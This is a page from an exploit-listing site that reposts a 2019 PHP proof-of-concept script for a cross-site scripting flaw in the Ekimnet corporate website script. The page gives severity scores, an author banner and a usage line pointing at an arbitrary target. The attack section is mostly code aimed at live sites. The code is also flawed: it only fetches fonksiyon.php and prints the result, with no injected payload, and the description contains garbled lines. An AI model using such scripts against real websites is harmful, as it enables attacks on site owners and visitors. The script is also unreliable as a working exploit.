Advertisement






Ekimnet Kurumsal Firma Scripti // Cross Site Scripting

CVE Category Price Severity
CWE-79 Unknown High
Author Risk Exploitation Type Date
High Remote 2019-10-19
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019100132

Below is a copy:

Ekimnet Kurumsal Firma Scripti // Cross Site Scripting
#!/usr/bin/php -f
<?php
##################################################################
# Exploit Ttle : Ekimnet Kurumsal Firma Scripti XSS
# Venedor Homepage : https://ekimnet.com/
# Software Link : https://ekimnet.com/2018-07-21_01-13-17/
#
# Author : z3r0fy
# www.bighatz.org - www.bugcontainer.gq
#
# Using PoC : php -f poc.php http://yourtarget.com
##################################################################


/*
DESCRIPTION

Userinput reaches sensitive sink. 

Check index.php

18: echo echo $url;  // fonksiyon.php
6: $url = "http://" . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']);  // fonksiyon.php

*/

//
// HTTP SERVER, 
//

$target = $argv[1];

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/fonksiyon.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;
?>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.